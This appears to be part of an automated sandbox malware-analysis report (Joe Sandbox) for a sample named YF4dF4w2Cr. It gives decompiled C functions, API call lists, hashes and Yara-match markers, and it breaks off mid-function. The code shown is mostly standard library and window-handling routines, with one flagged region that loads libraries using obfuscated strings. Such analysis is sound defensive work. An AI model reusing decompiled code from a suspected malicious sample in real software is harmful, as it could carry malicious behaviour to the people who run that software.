                  • Source File: 00000001.00000002.659116467.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.659112623.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659156937.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659178064.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659187745.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: LockitLockit::_std::_$Exception@8GetfacetH_prolog3IncrefRegisterThrowcodecvtstd::bad_exception::bad_exceptionstd::locale::_std::locale::facet::_std::locale::facet::facet_
                  • String ID: bad cast
                  • API String ID: 577375395-3145022300
                  • Opcode ID: 08916e8601030b88c8772c978c6339b6b33d72f4ec2f0943d0d0d6baf5f80f4f
                  • Instruction ID: b9ca8288bc3497393f69db73b50c762de20d67692500da4ed427a5f0706e090c
                  • Opcode Fuzzy Hash: 08916e8601030b88c8772c978c6339b6b33d72f4ec2f0943d0d0d6baf5f80f4f
                  • Instruction Fuzzy Hash: 4701C43194521997EF05FB61C882ABE7235AF44329F54021FF1106B2E1DF7C9A059BAD
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 0041EA0E, Relevance: 17.5, APIs: 5, Strings: 5, Instructions: 28libraryloaderCOMMON
                  Download Yara Rule
                  C-Code - Quality: 91%
                  			E0041EA0E(void* __esi) {
				void* _t1;
				struct HINSTANCE__* _t2;
				_Unknown_base(*)()* _t6;
				void* _t7;
				void* _t8;
				void* _t9;
				void* _t10;

				_t10 = __esi;
				if( *0x466500 == 0) {
					_t2 = GetModuleHandleA("KERNEL32");
					 *0x466500 = _t2;
					_t14 = _t2;
					if(_t2 == 0) {
						_t2 = E00406436(_t7, _t8, _t9, __esi, _t14);
					}
					_push(_t10);
					 *0x4664ec = GetProcAddress(_t2, "CreateActCtxW");
					 *0x4664f0 = GetProcAddress( *0x466500, "ReleaseActCtx");
					 *0x4664f4 = GetProcAddress( *0x466500, "ActivateActCtx");
					_t6 = GetProcAddress( *0x466500, "DeactivateActCtx");
					 *0x4664f8 = _t6;
					return _t6;
				}
				return _t1;
			}










                  0x0041ea0e
                  0x0041ea15
                  0x0041ea1c
                  0x0041ea22
                  0x0041ea27
                  0x0041ea29
                  0x0041ea2b
                  0x0041ea2b
                  0x0041ea30
                  0x0041ea4a
                  0x0041ea5c
                  0x0041ea6e
                  0x0041ea73
                  0x0041ea75
                  0x00000000
                  0x0041ea7a
                  0x0041ea7b

                  APIs
                  • GetModuleHandleA.KERNEL32(KERNEL32,0041EB28), ref: 0041EA1C
                  • GetProcAddress.KERNEL32(00000000,CreateActCtxW), ref: 0041EA3D
                  • GetProcAddress.KERNEL32(ReleaseActCtx), ref: 0041EA4F
                  • GetProcAddress.KERNEL32(ActivateActCtx), ref: 0041EA61
                  • GetProcAddress.KERNEL32(DeactivateActCtx), ref: 0041EA73
                    • Part of subcall function 00406436: __CxxThrowException@8.LIBCMT ref: 0040644C
                    • Part of subcall function 00406436: __EH_prolog3.LIBCMT ref: 00406459
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.659116467.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.659112623.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659156937.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659178064.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659187745.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: AddressProc$Exception@8H_prolog3HandleModuleThrow
                  • String ID: ActivateActCtx$CreateActCtxW$DeactivateActCtx$KERNEL32$ReleaseActCtx
                  • API String ID: 417325364-2424895508
                  • Opcode ID: a55b86447eb033fc2c2ed33bbb383f0b3294b9c3705bd7f49da141e42ade0cd5
                  • Instruction ID: 797181131107fc9c9d18895cd176618ea7f7a223a3ca38473e3e5917ec363889
                  • Opcode Fuzzy Hash: a55b86447eb033fc2c2ed33bbb383f0b3294b9c3705bd7f49da141e42ade0cd5
                  • Instruction Fuzzy Hash: E6F0F878D40311BADB11AF72BC0AA463EA4FB48756712443BEC1192276FBF994448E8E
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 0040607D, Relevance: 15.1, APIs: 10, Instructions: 141windowCOMMON
                  Download Yara Rule
                  C-Code - Quality: 81%
                  			E0040607D(int __ebx, void* __edi, void* __esi, void* __eflags) {
				struct HMENU__* _t91;
				int _t92;
				struct HMENU__* _t100;
				int _t105;
				CHAR* _t111;
				signed int* _t116;
				signed int _t127;
				int* _t130;
				int* _t132;
				int _t134;
				void* _t135;

				_t121 = __ebx;
				_push(0x130);
				E00431B04(E0044AC2D, __ebx, __edi, __esi);
				_t132 =  *(_t135 + 0x10);
				 *(_t135 - 0x130) =  *(_t135 + 8);
				_t91 =  *(_t135 + 0xc);
				_t134 = 0;
				 *(_t135 - 0x128) = _t91;
				 *((intOrPtr*)(_t135 - 0x138)) = 0;
				 *(_t135 - 0x134) = 0;
				_t92 = GetMenuItemCount(_t91);
				 *(_t135 - 0x13c) = _t92;
				 *(_t135 - 0x118) = 0;
				 *(_t135 - 0x114) = 0;
				if( *(_t135 + 0x14) == 1) {
					 *(_t135 - 0x114) =  *_t132;
				}
				 *(_t135 - 0x11c) = _t134;
				if(_t92 <= _t134) {
					L25:
					_t132[ *(_t135 + 0x14)] =  *(_t135 - 0x118);
					L26:
					return E00431B87(_t121, _t132, _t134);
				}
				_t134 = 0x400;
				do {
					 *(_t135 - 0x120) = GetSubMenu( *(_t135 - 0x128),  *(_t135 - 0x11c));
					_t121 = GetMenuState( *(_t135 - 0x128),  *(_t135 - 0x11c), _t134);
					if( *(_t135 - 0x120) != 0 || (_t121 & 0x00000800) == 0) {
						 *(_t135 - 0x12c) = 0;
						__eflags =  *(_t135 + 0x18);
						if( *(_t135 + 0x18) != 0) {
							__eflags =  *(_t135 + 0x14) - 5;
							if( *(_t135 + 0x14) == 5) {
								__eflags = _t132[5] - 1;
								if(_t132[5] == 1) {
									 *(_t135 - 0x12c) = GetSubMenu( *(_t135 - 0x130),  *(_t135 - 0x114));
								}
							}
						}
						_t100 = GetMenuStringA( *(_t135 - 0x128),  *(_t135 - 0x11c), _t135 - 0x110, 0x100, _t134);
						__eflags =  *(_t135 - 0x120);
						if( *(_t135 - 0x120) == 0) {
							__eflags = _t100;
							if(_t100 <= 0) {
								goto L23;
							}
							_push(_t135 - 0x110);
							_push(GetMenuItemID( *(_t135 - 0x128),  *(_t135 - 0x11c)));
							_t121 = _t121 | _t134;
							__eflags = _t121;
							_push(_t121);
							goto L22;
						} else {
							__eflags =  *(_t135 - 0x12c);
							if(__eflags == 0) {
								_t105 = GetMenuItemCount( *(_t135 - 0x120));
								__eflags = _t105;
								if(_t105 == 0) {
									goto L23;
								}
								_push(_t135 - 0x110);
								_push( *(_t135 - 0x120));
								_push(_t121 & 0x000000ff | 0x00000410);
								L22:
								InsertMenuA( *(_t135 - 0x130),  *(_t135 - 0x114), ??, ??, ??);
								 *(_t135 - 0x114) =  *(_t135 - 0x114) + 1;
								_t76 = _t135 - 0x118;
								 *_t76 =  *(_t135 - 0x118) + 1;
								__eflags =  *_t76;
								goto L23;
							}
							_push( *((intOrPtr*)(E0041F363(_t121, _t132, _t134, __eflags) + 0x10)));
							E00406039(_t121, _t135 - 0x124, _t130, _t132, _t134, __eflags);
							_t111 =  *(_t135 - 0x124);
							 *(_t135 - 4) =  *(_t135 - 4) & 0x00000000;
							__eflags =  *(_t111 - 0xc);
							if( *(_t111 - 0xc) != 0) {
								E00405D76(_t135 - 0x124, 0x20);
							}
							E00405EC1(_t135 - 0x124, _t135 - 0x110);
							_t121 =  *(_t135 - 0x120);
							AppendMenuA( *(_t135 - 0x12c), 0x10, _t121,  *(_t135 - 0x124));
							 *(_t135 - 4) =  *(_t135 - 4) | 0xffffffff;
							_t116 =  &(_t132[ *(_t135 + 0x14)]);
							 *_t116 =  *_t116 & 0x00000000;
							 *((intOrPtr*)(_t116 - 4)) =  *((intOrPtr*)(_t116 - 4)) + 1;
							 *((intOrPtr*)(_t135 - 0x138)) = 1;
							 *(_t135 - 0x134) = _t121;
							E004010B0( &(( *(_t135 - 0x124))[0xfffffffffffffff0]), _t130);
							goto L23;
						}
					} else {
						_t127 =  *(_t135 + 0x14);
						_t121 =  *(_t135 - 0x118);
						_t130 =  &(_t132[_t127]);
						 *_t130 =  *(_t135 - 0x118);
						 *(_t135 - 0x118) = 0;
						if(_t127 < 5) {
							 *(_t135 - 0x114) =  *(_t135 - 0x114) + _t130[1];
						}
						 *(_t135 + 0x14) =  *(_t135 + 0x14) + 2;
					}
					L23:
					 *(_t135 - 0x11c) =  *(_t135 - 0x11c) + 1;
				} while ( *(_t135 - 0x11c) <  *(_t135 - 0x13c));
				if( *((intOrPtr*)(_t135 - 0x138)) != 0) {
					goto L26;
				}
				goto L25;
			}














                  0x0040607d
                  0x0040607d
                  0x00406087
                  0x0040608f
                  0x00406092
                  0x00406098
                  0x0040609b
                  0x0040609e
                  0x004060a4
                  0x004060aa
                  0x004060b0
                  0x004060ba
                  0x004060c0
                  0x004060c6
                  0x004060cc
                  0x004060d0
                  0x004060d0
                  0x004060d8
                  0x004060de
                  0x004062d0
                  0x004062d9
                  0x004062dc
                  0x004062e7
                  0x004062e7
                  0x004060e4
                  0x004060e9
                  0x00406102
                  0x00406114
                  0x0040611e
                  0x00406153
                  0x00406159
                  0x0040615c
                  0x0040615e
                  0x00406162
                  0x00406164
                  0x00406168
                  0x0040617c
                  0x0040617c
                  0x00406168
                  0x00406162
                  0x0040619b
                  0x004061a1
                  0x004061a8
                  0x00406270
                  0x00406272
                  0x00000000
                  0x00000000
                  0x0040627a
                  0x0040628d
                  0x0040628e
                  0x0040628e
                  0x00406290
                  0x00000000
                  0x004061ae
                  0x004061ae
                  0x004061b5
                  0x0040624e
                  0x00406254
                  0x00406256
                  0x00000000
                  0x00000000
                  0x0040625e
                  0x0040625f
                  0x0040626d
                  0x00406291
                  0x0040629d
                  0x004062a3
                  0x004062a9
                  0x004062a9
                  0x004062a9
                  0x00000000
                  0x004062a9
                  0x004061c0
                  0x004061c9
                  0x004061ce
                  0x004061d4
                  0x004061d8
                  0x004061dc
                  0x004061e6
                  0x004061e6
                  0x004061f8
                  0x00406203
                  0x00406212
                  0x00406221
                  0x00406225
                  0x00406228
                  0x0040622b
                  0x00406231
                  0x0040623b
                  0x00406241
                  0x00000000
                  0x00406241
                  0x00406128
                  0x00406128
                  0x0040612e
                  0x00406134
                  0x00406137
                  0x00406139
                  0x0040613f
                  0x00406144
                  0x00406144
                  0x0040614a
                  0x0040614a
                  0x004062af
                  0x004062af
                  0x004062bb
                  0x004062ce
                  0x00000000
                  0x00000000
                  0x00000000

                  APIs
                  Memory Dump Source
                  • Source File: 00000001.00000002.659116467.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.659112623.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659156937.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659178064.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659187745.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: Menu$Item$Count$AppendH_prolog3_InsertStateString
                  • String ID:
                  • API String ID: 2171526683-0
                  • Opcode ID: 59b0d03c7a4de24bfd5d3264c4ab79dec59a58f44716801c7520d46a18b6b469
                  • Instruction ID: 28db6550187b75f0f8ddc5cf35a0011be1a11c4ba9a9efde7d1322a6cca787e0
                  • Opcode Fuzzy Hash: 59b0d03c7a4de24bfd5d3264c4ab79dec59a58f44716801c7520d46a18b6b469
                  • Instruction Fuzzy Hash: ED6103708002289FCB25DF14CD85BD9BBB5FF09314F0141EAE64AA62A1D7745EA1CF98
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 023E9D18, Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 178libraryCOMMON
                  Download Yara Rule
                  APIs
                  • LoadLibraryW.KERNEL32(00000000), ref: 023EA2D8
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.659738344.00000000023E1000.00000020.00000001.sdmp, Offset: 023E1000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_23e1000_YF4dF4w2Cr.jbxd
                  Yara matches
                  Similarity
                  • API ID: LibraryLoad
                  • String ID: C1g9$Hw$P<Ex$Y[]C$[D`=$tN o$wRR|
                  • API String ID: 1029625771-1834093024
                  • Opcode ID: 45897a37092bf01ef51b0468512db1d24bb9984b40920681da94a22858650713
                  • Instruction ID: dfe5466a0de69488b5fe992ea43bcac66dce4b292fa49aa1a66b1032e7aa7932
                  • Opcode Fuzzy Hash: 45897a37092bf01ef51b0468512db1d24bb9984b40920681da94a22858650713
                  • Instruction Fuzzy Hash: B7D1B7B48063ACCBDB60CF829A857DDBB70FB15740F2086C9D5593B214DB750A86CF96
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 0042B11B, Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 173comCOMMON
                  Download Yara Rule
                  C-Code - Quality: 65%
                  			E0042B11B(void* __ebx, intOrPtr __ecx, void* __edx, struct _OSVERSIONINFOA __edi, void* __esi, void* __eflags) {
				intOrPtr _t87;
				signed int _t89;
				void* _t99;
				intOrPtr _t101;
				void* _t104;
				intOrPtr* _t105;
				void* _t106;
				intOrPtr* _t107;
				char* _t114;
				intOrPtr _t115;
				signed int _t119;
				void* _t126;
				char* _t127;
				signed char _t128;
				intOrPtr _t146;
				void* _t147;
				void* _t148;
				signed int _t157;

				_t143 = __edi;
				_t136 = __edx;
				_push(0xac);
				E00431B04(E0044C739, __ebx, __edi, __esi);
				 *((intOrPtr*)(_t147 - 0xb0)) =  *((intOrPtr*)(_t147 + 0x10));
				 *((intOrPtr*)(_t147 - 0xac)) =  *((intOrPtr*)(_t147 + 0x18));
				_t146 = __ecx;
				 *((intOrPtr*)(_t147 - 0xb8)) = __ecx;
				E0042A1E2(__ecx,  *((intOrPtr*)(_t147 + 0x1c)));
				 *((intOrPtr*)(_t147 - 4)) = 0;
				 *((intOrPtr*)(__ecx)) = 0x4547f4;
				E004014C0(__ecx + 0x8c, __edx);
				 *((intOrPtr*)(_t146 + 0x1d8)) = 0;
				 *((char*)(_t147 - 4)) = 1;
				 *((intOrPtr*)(_t146 + 0x1dc)) = 0;
				if( *((intOrPtr*)(_t147 + 0x20)) == 0) {
					_t143 = 0x94;
					E00431160(0x94, _t147 - 0xa4, 0, 0x94);
					_t148 = _t148 + 0xc;
					 *(_t147 - 0xa4) = 0x94;
					_t119 = GetVersionExA(_t147 - 0xa4);
					 *((intOrPtr*)(_t147 + 0x20)) = 0x58;
					asm("sbb eax, eax");
					 *(_t146 + 0x78) =  !_t119 &  *(_t147 + 0x24);
				}
				_t87 = E0043108C(0, _t136, _t143,  *((intOrPtr*)(_t147 + 0x20)));
				_pop(_t126);
				 *((intOrPtr*)(_t146 + 0x74)) = _t87;
				_t155 = _t87;
				if(_t87 == 0) {
					_t87 = E004063FE(0, _t126, _t143, _t146, _t155);
				}
				E00431160(_t143, _t87, 0,  *((intOrPtr*)(_t147 + 0x20)));
				_t89 =  *(_t147 + 8);
				 *(_t146 + 0x88) = _t89;
				asm("sbb eax, eax");
				 *((intOrPtr*)(_t146 + 0x54)) =  ~_t89 + 0x7005;
				 *((intOrPtr*)(_t146 + 0x1d4)) = 0;
				_t127 = _t146 + 0x90;
				 *_t127 = 0;
				_t144 = _t146 + 0xd0;
				 *_t144 = 0;
				 *((intOrPtr*)( *((intOrPtr*)(_t146 + 0x74)))) =  *((intOrPtr*)(_t147 + 0x20));
				 *((intOrPtr*)( *((intOrPtr*)(_t146 + 0x74)) + 0x1c)) = _t144;
				 *((intOrPtr*)( *((intOrPtr*)(_t146 + 0x74)) + 0x20)) = 0x104;
				 *((intOrPtr*)( *((intOrPtr*)(_t146 + 0x74)) + 0x3c)) =  *((intOrPtr*)(_t147 + 0xc));
				 *((intOrPtr*)( *((intOrPtr*)(_t146 + 0x74)) + 0x24)) = _t127;
				_t128 = 0x40;
				 *( *((intOrPtr*)(_t146 + 0x74)) + 0x28) = _t128;
				 *( *((intOrPtr*)(_t146 + 0x74)) + 0x34) =  *( *((intOrPtr*)(_t146 + 0x74)) + 0x34) |  *(_t147 + 0x14) | 0x00080020;
				if(( *(_t147 + 0x14) & _t128) != 0) {
					_t115 =  *((intOrPtr*)(_t146 + 0x74));
					_t50 = _t115 + 0x34;
					 *_t50 =  *(_t115 + 0x34) & 0xff7fffff;
					_t157 =  *_t50;
				}
				_t99 = E0041F363(0, _t144, _t146, _t157);
				_t129 =  *((intOrPtr*)(_t146 + 0x74));
				 *((intOrPtr*)( *((intOrPtr*)(_t146 + 0x74)) + 8)) =  *((intOrPtr*)(_t99 + 0xc));
				_t101 =  *((intOrPtr*)(_t146 + 0x74));
				 *((intOrPtr*)(_t101 + 0x44)) = E0042A570;
				if( *((intOrPtr*)(_t147 - 0xb0)) != 0) {
					_t101 = E004048ED(0, _t129, _t144, _t146, _t144, 0x104,  *((intOrPtr*)(_t147 - 0xb0)), 0xffffffff);
				}
				if( *((intOrPtr*)(_t147 - 0xac)) != 0) {
					_t144 = _t146 + 0x8c;
					E00402CA0(_t146 + 0x8c, _t146,  *((intOrPtr*)(_t147 - 0xac)));
					_t113 = E004014F0(_t146 + 0x8c, 0);
					while(1) {
						_t114 = E004334ED(_t113, 0x7c);
						if(_t114 == 0) {
							break;
						}
						 *_t114 = 0;
						_t113 = _t114 + 1;
						__eflags = _t114 + 1;
					}
					_t101 =  *((intOrPtr*)(_t146 + 0x74));
					 *((intOrPtr*)(_t101 + 0xc)) =  *((intOrPtr*)(_t146 + 0x8c));
				}
				if( *(_t146 + 0x78) == 1) {
					__imp__CoInitializeEx(0, 2);
					if(_t101 < 0) {
						L23:
						 *(_t146 + 0x78) = 0;
					} else {
						_t104 = _t147 - 0xa8;
						_push(_t104);
						_push(0x454974);
						_t144 = _t146 + 0x1d8;
						_push(1);
						 *_t144 = 0x4547a0;
						 *((intOrPtr*)(_t146 + 0x1dc)) = 0x4547d0;
						_push(0);
						if( *(_t146 + 0x88) == 0) {
							_push(0x463168);
						} else {
							_push(0x463158);
						}
						__imp__CoCreateInstance();
						if(_t104 < 0) {
							goto L23;
						} else {
							_t105 =  *((intOrPtr*)(_t147 - 0xa8));
							_t130 =  *_t105;
							_t106 =  *((intOrPtr*)( *_t105))(_t105, 0x454764, _t147 - 0xb4);
							_t165 = _t106;
							if(_t106 < 0) {
								L20:
								E00406436(0, _t130, _t144, _t146, _t165);
							}
							_t107 =  *((intOrPtr*)(_t147 - 0xa8));
							_t130 =  *_t107;
							_push(_t146 + 0x7c);
							_push(_t144);
							_push(_t107);
							if( *((intOrPtr*)( *_t107 + 0x1c))() < 0) {
								goto L20;
							}
							 *((intOrPtr*)(_t146 + 0x80)) =  *((intOrPtr*)(_t147 - 0xa8));
							 *((intOrPtr*)(_t146 + 0x84)) =  *((intOrPtr*)(_t147 - 0xb4));
						}
					}
				}
				return E00431B87(0, _t144, _t146);
			}





















                  0x0042b11b
                  0x0042b11b
                  0x0042b11b
                  0x0042b125
                  0x0042b12d
                  0x0042b136
                  0x0042b13f
                  0x0042b142
                  0x0042b148
                  0x0042b155
                  0x0042b158
                  0x0042b15e
                  0x0042b163
                  0x0042b169
                  0x0042b16d
                  0x0042b176
                  0x0042b178
                  0x0042b186
                  0x0042b18b
                  0x0042b195
                  0x0042b19b
                  0x0042b1a8
                  0x0042b1af
                  0x0042b1b6
                  0x0042b1b6
                  0x0042b1bc
                  0x0042b1c1
                  0x0042b1c2
                  0x0042b1c5
                  0x0042b1c7
                  0x0042b1c9
                  0x0042b1c9
                  0x0042b1d3
                  0x0042b1d8
                  0x0042b1de
                  0x0042b1e9
                  0x0042b1f0
                  0x0042b1f6
                  0x0042b1fc
                  0x0042b202
                  0x0042b204
                  0x0042b20a
                  0x0042b20c
                  0x0042b214
                  0x0042b21a
                  0x0042b224
                  0x0042b22d
                  0x0042b235
                  0x0042b236
                  0x0042b242
                  0x0042b248
                  0x0042b24a
                  0x0042b24d
                  0x0042b24d
                  0x0042b24d
                  0x0042b24d
                  0x0042b254
                  0x0042b25c
                  0x0042b25f
                  0x0042b262
                  0x0042b265
                  0x0042b272
                  0x0042b282
                  0x0042b287
                  0x0042b290
                  0x0042b298
                  0x0042b2a0
                  0x0042b2a8
                  0x0042b2b2
                  0x0042b2b5
                  0x0042b2be
                  0x00000000
                  0x00000000
                  0x0042b2af
                  0x0042b2b1
                  0x0042b2b1
                  0x0042b2b1
                  0x0042b2c0
                  0x0042b2c9
                  0x0042b2c9
                  0x0042b2d0
                  0x0042b2d9
                  0x0042b2e1
                  0x0042b379
                  0x0042b379
                  0x0042b2e7
                  0x0042b2e7
                  0x0042b2ed
                  0x0042b2ee
                  0x0042b2f3
                  0x0042b2f9
                  0x0042b2fb
                  0x0042b301
                  0x0042b30b
                  0x0042b312
                  0x0042b31b
                  0x0042b314
                  0x0042b314
                  0x0042b314
                  0x0042b320
                  0x0042b328
                  0x00000000
                  0x0042b32a
                  0x0042b32a
                  0x0042b330
                  0x0042b33f
                  0x0042b341
                  0x0042b343
                  0x0042b345
                  0x0042b345
                  0x0042b345
                  0x0042b34a
                  0x0042b350
                  0x0042b355
                  0x0042b356
                  0x0042b357
                  0x0042b35d
                  0x00000000
                  0x00000000
                  0x0042b365
                  0x0042b371
                  0x0042b371
                  0x0042b328
                  0x0042b2e1
                  0x0042b383

                  APIs
                  • __EH_prolog3_GS.LIBCMT ref: 0042B125
                  • _memset.LIBCMT ref: 0042B186
                  • GetVersionExA.KERNEL32(?), ref: 0042B19B
                  • _malloc.LIBCMT ref: 0042B1BC
                  • _memset.LIBCMT ref: 0042B1D3
                  • CoInitializeEx.OLE32(00000000,00000002), ref: 0042B2D9
                  • CoCreateInstance.OLE32(00463168,00000000), ref: 0042B320
                    • Part of subcall function 00406436: __CxxThrowException@8.LIBCMT ref: 0040644C
                    • Part of subcall function 00406436: __EH_prolog3.LIBCMT ref: 00406459
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.659116467.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.659112623.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659156937.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659178064.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659187745.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: _memset$CreateException@8H_prolog3H_prolog3_InitializeInstanceThrowVersion_malloc
                  • String ID: X
                  • API String ID: 4031887728-3081909835
                  • Opcode ID: ee236fb7defe8795996fa497833549cdea1f237598b8f663734decd1af400ac8
                  • Instruction ID: 5172e0a2d860184040d2a6c4a60c16d353be7440ddfd1ca1bccc4f22e79cac10
                  • Opcode Fuzzy Hash: ee236fb7defe8795996fa497833549cdea1f237598b8f663734decd1af400ac8
                  • Instruction Fuzzy Hash: 9A7168B4600755DFDB20DF25C880B9ABBE0FF49308F4045AEE9999B361D738A984CF55
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 0040A380, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 99windowCOMMON
                  Download Yara Rule
                  C-Code - Quality: 97%
                  			E0040A380(void* __ebx, signed int __ecx, void* __edi, signed int __esi, void* __eflags) {
				intOrPtr* _t34;
				intOrPtr _t36;
				int _t39;
				intOrPtr _t46;
				signed int _t57;
				signed int _t66;
				struct HWND__* _t71;
				void* _t72;

				_t70 = __esi;
				_t58 = __ecx;
				_push(0x18);
				E00431A9B(E0044ACFA, __ebx, __edi, __esi);
				_t57 = __ecx;
				_t34 = __ecx + 0xb8;
				 *_t34 =  *_t34 + 1;
				if( *_t34 <= 1) {
					_t36 = E004105B2(__ecx, __ecx, __edi);
					 *((intOrPtr*)(_t72 - 0x10)) = _t36;
					_t77 = _t36;
					if(_t36 == 0) {
						L2:
						E00406436(_t57, _t58, 0, _t70, _t77);
					}
					 *(_t72 - 0x24) = 0x450028;
					 *((intOrPtr*)(_t72 - 0x20)) = 0;
					 *((intOrPtr*)(_t72 - 0x14)) = 0;
					 *((intOrPtr*)(_t72 - 0x18)) = 0;
					 *(_t72 - 0x1c) = 0;
					 *(_t72 - 4) = 0;
					_t71 = GetWindow(GetDesktopWindow(), 5);
					if(_t71 != 0) {
						do {
							_t39 = IsWindowEnabled(_t71);
							_t79 = _t39;
							if(_t39 != 0 && E0040EE68(_t58, 0, _t71, _t79, _t71) != 0 && E00408105( *((intOrPtr*)( *((intOrPtr*)(_t72 - 0x10)) + 0x20)), _t71) != 0 && SendMessageA(_t71, 0x36c, 0, 0) == 0) {
								EnableWindow(_t71, 0);
								_t58 = _t72 - 0x24;
								E00409F5C(_t72 - 0x24, _t71);
							}
							_t71 = GetWindow(_t71, 2);
						} while (_t71 != 0);
						_t70 =  *(_t72 - 0x1c);
						if(_t70 != 0) {
							_t86 = _t70 > 0;
							if(_t70 > 0) {
								goto L2;
							} else {
								_t66 = 4;
								_t46 = E00404461(_t86,  ~(0 | _t86 > 0x00000000) | (_t70 + 0x00000001) * _t66);
								_t58 = _t70 << 2;
								 *((intOrPtr*)(_t57 + 0xbc)) = _t46;
								 *((intOrPtr*)((_t70 << 2) + _t46)) = 0;
								if((0 |  *((intOrPtr*)(_t72 - 0x20)) != 0x00000000) == 0) {
									goto L2;
								} else {
									E004059F9(0, _t70,  *((intOrPtr*)(_t57 + 0xbc)), _t58,  *((intOrPtr*)(_t72 - 0x20)), _t58);
								}
							}
						}
					}
					 *(_t72 - 4) =  *(_t72 - 4) | 0xffffffff;
					_t34 = E00409F75(_t72 - 0x24);
				}
				return E00431B73(_t34);
			}











                  0x0040a380
                  0x0040a380
                  0x0040a380
                  0x0040a387
                  0x0040a38c
                  0x0040a38e
                  0x0040a394
                  0x0040a399
                  0x0040a39f
                  0x0040a3a6
                  0x0040a3a9
                  0x0040a3ab
                  0x0040a3ad
                  0x0040a3ad
                  0x0040a3ad
                  0x0040a3b2
                  0x0040a3b9
                  0x0040a3bc
                  0x0040a3bf
                  0x0040a3c2
                  0x0040a3c7
                  0x0040a3d7
                  0x0040a3db
                  0x0040a3e1
                  0x0040a3e2
                  0x0040a3e8
                  0x0040a3ea
                  0x0040a41a
                  0x0040a421
                  0x0040a424
                  0x0040a424
                  0x0040a432
                  0x0040a434
                  0x0040a438
                  0x0040a43d
                  0x0040a446
                  0x0040a448
                  0x00000000
                  0x0040a44e
                  0x0040a452
                  0x0040a460
                  0x0040a468
                  0x0040a46b
                  0x0040a471
                  0x0040a47e
                  0x00000000
                  0x0040a484
                  0x0040a48f
                  0x0040a494
                  0x0040a47e
                  0x0040a448
                  0x0040a43d
                  0x0040a497
                  0x0040a49e
                  0x0040a49e
                  0x0040a4a8

                  APIs
                  • __EH_prolog3.LIBCMT ref: 0040A387
                  • GetDesktopWindow.USER32 ref: 0040A3CA
                  • GetWindow.USER32(00000000), ref: 0040A3D1
                  • IsWindowEnabled.USER32(00000000), ref: 0040A3E2
                  • SendMessageA.USER32(00000000,0000036C,00000000,00000000), ref: 0040A40E
                  • EnableWindow.USER32(00000000,00000000), ref: 0040A41A
                  • GetWindow.USER32(00000000,00000002), ref: 0040A42C
                    • Part of subcall function 00406436: __CxxThrowException@8.LIBCMT ref: 0040644C
                    • Part of subcall function 00406436: __EH_prolog3.LIBCMT ref: 00406459
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.659116467.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.659112623.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659156937.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659178064.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659187745.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: Window$H_prolog3$DesktopEnableEnabledException@8MessageSendThrow
                  • String ID: (
                  • API String ID: 2907971239-3887548279
                  • Opcode ID: e63a990042588c24a6beb72bb7394faddda122b26c843fd20fc822a59a8eabbc
                  • Instruction ID: 3bb135bf242b6c09986745a0261cf98ccff5f01dbf2b9a6c7ca042f580c0f20a
                  • Opcode Fuzzy Hash: e63a990042588c24a6beb72bb7394faddda122b26c843fd20fc822a59a8eabbc
                  • Instruction Fuzzy Hash: 7D31C4359002209FDB11AF668C499AFBAB8FF45300F55453EE812BB1D1EB784D51CB6D
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 004105DA, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 69windowCOMMON
                  Download Yara Rule
                  C-Code - Quality: 93%
                  			E004105DA(void* __ebx, void* __ecx, signed int _a4, long _a8) {
